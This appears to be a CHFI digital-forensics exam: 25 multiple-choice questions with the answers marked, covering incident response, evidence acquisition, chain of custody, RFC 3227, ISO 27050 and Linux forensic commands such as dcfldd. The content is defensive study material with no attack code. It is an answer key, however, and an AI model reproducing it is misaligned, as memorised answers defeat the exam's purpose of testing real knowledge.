# CHFI Final Exam 1. Which of the following processes involves the technical methods and organizational measures for discovering, tracing, and inculpating individuals or groups responsible for cyberattacks? - [ ] Physical acquisition - [ ] eDiscovery - [X] Cyber Attribution - [ ] Data recovery 2. Xavier, a forensic expert, was investigating a cyber incident. He started the investigation by collecting and analyzing information from a suspected device at the crime scene. He identified that the attacker hid their IP address using proxies and used a fake identity for communication. Which of the following challenges of cybercrime is demonstrated in the above scenario? - [ ] Limited legal understanding - [ ] Speed - [X] Anonymity - [ ] Evidence size and complexity 3. Which of the following techniques best describes an organization’s ability to optimally use digital evidence in a limited time and with minimal investigation costs? - [ ] Chain of custody - [X] Forensic readiness - [ ] Vulnerability assessment - [ ] Trial obfuscation 4. In which of the following steps of forensic readiness planning do investigators determine what currently happens to potential evidence data and the impact on the business while retrieving the information? - [ ] Identify the potential evidence required for an incident. - [X] Determine the sources of evidence. - [ ] Establish a policy for securely handling and storing the collected evidence. - [ ] Keep an incident response team ready to review the incident and preserve the evidence. 5. Which of the following practices indicates that an organization is not forensically prepared to maintain business continuity? - [ ] Minimize the required resources - [ ] Legally persecute the perpetrators and claim damages - [ ] Quickly determine the incidents - [X] Inability to collect legally sound evidence 6. Williams, a forensic specialist, was investigating a system suspected to be involved in a cybercrime. Williams collected the required evidence, eliminated the root cause of the incident, and closed all the attack vectors to prevent similar incidents in the future.In which of the following phases of incident response did Williams perform the above tasks? - [X] Eradication - [ ] Preparation for incident handling and response - [ ] Incident triage - [ ] Post-incident activities 7. Which of the following terms refers to the principles used to describe the expected behavior of an investigator while handling a case? - [ ] System baselining - [X] Code of ethics - [ ] Lawful interception - [ ] Tactics, techniques, and procedures 8. Identify the type of data acquisition technique in which an investigator can collect volatile data from suspected devices only when the device is powered on. - [ ] Static acquisition - [ ] Dead acquisition - [X] Live acquisition - [ ] Non-volatile acquisition 9. Which of the following types of data is considered the most volatile according to the RFC 3227 guidelines for evidence collection and archiving? - [X] Registers and processor cache - [ ] Physical configuration - [ ] Archival media - [ ] Network topology 10. Thomas, a forensics specialist, was resolving a case related to fake email broadcasting. Thomas retrieved data from the victim system for analysis to find the source of the email server. For this purpose, Thomas extracted only “.ost” files from the system as they can provide the required information about the incident. Identify the type of data acquisition performed by Thomas in the above scenario. - [ ] Sparse acquisition - [ ] Bit-stream disk-to-image-file - [ ] Bit-stream disk-to-disk - [X] Logical acquisition 11. Which of the following techniques refers to a backup program an investigator should have in case hardware or software does not work or there is any failure during an acquisition? - [ ] Data duplication - [ ] Chain of custody - [X] Plan for contingency - [ ] Data analysis 12. In which of the following forensic data acquisition steps do the investigators overwrite the data by applying a code of sequential zeros or ones to protect it from recovery? - [ ] Validating data acquisition - [X] Sanitize the target media - [ ] Acquiring volatile data - [ ] Planning for contingency 13. Which of the following is a program that allows bundling all files together into a single executable file via compression to bypass security software detection? - [ ] Dropper - [ ] Obfuscator - [ ] Payload - [X] Packer 14. Jude, a forensic expert, presented the final report of all his evidence findings related to a criminal case. Further, Jude provided supporting documents with details, including the source and author of the evidence and path of transmission involved in the case, to ensure that no piece of evidence was missed. Which of the following rules of evidence is demonstrated in the above scenario? - [ ] Admissible - [ ] Understandable - [ ] Complete - [X] Authentic 15. Which of the following sections of the (ACPO) Principles of Digital Evidence states that no action taken by law enforcement agencies, persons employed within those agencies, or their agents should change data that may subsequently be relied upon in court? - [ ] Principle 2 - [ ] Principle 4 - [ ] Principle 3 - [X] Principle 1 16. James, a forensic investigator, was tasked with identifying and seizing the electronic devices at a crime scene. For this purpose, James obtained documented permission from the owner of the target electronic device to perform a thorough investigation. Identify the activity performed by James during the investigation. - [X] Seeking consent - [ ] Searches without a warrant - [ ] Obtaining witness signatures - [ ] Obtaining a warrant for search and seizure 17. Which of the following is a legal document that demonstrates the progression of evidence as it travels from the original evidence location to the forensic laboratory? - [X] Chain of custody - [ ] Witness signature - [ ] Search warrant - [ ] Seeking consent 18. When handling evidence related to Internet usage, investigators must preserve the anonymity of other users. Which of the following issues does the above statement describe? - [X] Privacy issues - [ ] Environmental issues - [ ] Legal issues - [ ] Infrastructure issues 19. Identify the ISO standard that deals with electronic discovery activities such as identifying, preserving, collecting, processing, reviewing, analyzing, and producing electronically processed information (ESI). - [ ] ISO/IEC 27043 - [ ] ISO/IEC 27041 - [X] ISO/IEC 27050 - [ ] ISO/IEC 27042 20. Which of the following components of an SSD is volatile memory, requires power to retain data, and is included to increase the read/write performance of the SSD? - [ ] Host interface - [ ] Controller - [ ] NAND flash memory - [X] DRAM 21. Which stage in the booting process of a Linux system establishes a temporary root file system using the initial RAM disk (initrd) until the real file system is mounted? - [ ] Bootloader stage - [ ] BIOS stage - [ ] Grand unified bootloader (GRUB) stage - [X] Kernel stage 22. In which of the following phases of the computer forensics investigation methodology must the investigator take a photograph of the computer monitor’s screen and note down what was observed on the screen? - [X] Documenting the electronic crime scene - [ ] Evidence preservation - [ ] Data acquisition - [ ] Search and seizure 23. Which of the following commands allows investigators to mount an image in the APFS format and view its contents on a Linux system? - [X] losetup - [ ] wevtutil - [ ] fsutil - [ ] strings 24. Identify the dcfldd command that investigators use to compare an image file to the original medium, such as a drive or partition. - [X] dcfldd if=/dev/sda vf=image.dd - [ ] dcfldd if=/dev/sda of=usbimg.dat - [ ] dcfldd if=/dev/sda split=2M of=usbimg hash=md5 hashlog=usbhash.log - [ ] dd if=/dev/sdb | split –b 650m - image_sdb 25. Which of the following is a pre-installed command-line utility in Linux systems for scheduling commands, scripts, tasks, or jobs to execute at a specific time or for a repeated duration? - [ ] ListDLLs - [ ] nbtstat - [ ] ipconfig - [X] Cron